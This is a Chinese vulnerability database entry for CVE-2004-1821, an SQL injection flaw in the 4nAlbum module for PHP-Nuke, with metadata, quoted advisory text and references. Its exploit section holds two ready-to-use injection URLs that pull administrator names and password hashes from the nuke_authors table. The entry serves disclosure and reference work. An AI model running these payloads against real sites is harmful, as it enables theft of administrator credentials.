PHPNuke Multiple WarpSpeed 4nAlbum漏洞

PHPNuke Multiple WarpSpeed 4nAlbum漏洞

漏洞ID 1107791 漏洞类型 SQL注入
发布时间 2004-03-15 更新时间 2005-10-20
图片[1]-PHPNuke Multiple WarpSpeed 4nAlbum漏洞-安全小百科CVE编号 CVE-2004-1821
图片[2]-PHPNuke Multiple WarpSpeed 4nAlbum漏洞-安全小百科CNNVD-ID CNNVD-200403-067
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23816
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200403-067
|漏洞详情
PHP-Nuke6.5到7.0版本的4nalbum0.92存在SQL注入漏洞。远程攻击者借助gid参数获得特权或执行未经授权的数据库操作。
|漏洞EXP
source: http://www.securityfocus.com/bid/9881/info
 
It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input.
 
There is an information disclosure issue with the 'displaycategory.php' script.
 
There is a remote file inclusion vulnerability in the 'displaycategory.php' script.
 
A cross-site scripting vulnerability in the 'nmimage.php' script has also been reported.
 
Finally an SQL injection vulnerability has been reported. This issue may be leveraged through the 'modules.php' script of phpNuke while requesting the 'index' file of the 4nAlbum module.
 
This issue has been reported to affect version 0.92 of the software. It is quite likely that other versions are affected as well.


http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*
http://www.example.com/phpNukeDirectory/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*
|参考资料

来源:SECUNIA
名称:11134
链接:http://secunia.com/advisories/11134
来源:XF
名称:4nalbum-modulesphp-SQL-injection(15498)
链接:http://xforce.iss.net/xforce/xfdb/15498
来源:BID
名称:9881
链接:http://www.securityfocus.com/bid/9881
来源:OSVDB
名称:4294
链接:http://www.osvdb.org/4294
来源:BUGTRAQ
名称:20040315[waraxe-2004-SA#006-Multiplevulnerabilitiesin4nalbummoduleforPhpNuke]
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107937780222514&w;=2

相关推荐: Hypermail Local Temporary File Race Condition Vulnerability

Hypermail Local Temporary File Race Condition Vulnerability 漏洞ID 1100713 漏洞类型 Race Condition Error 发布时间 2003-02-27 更新时间 2003-02-27…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享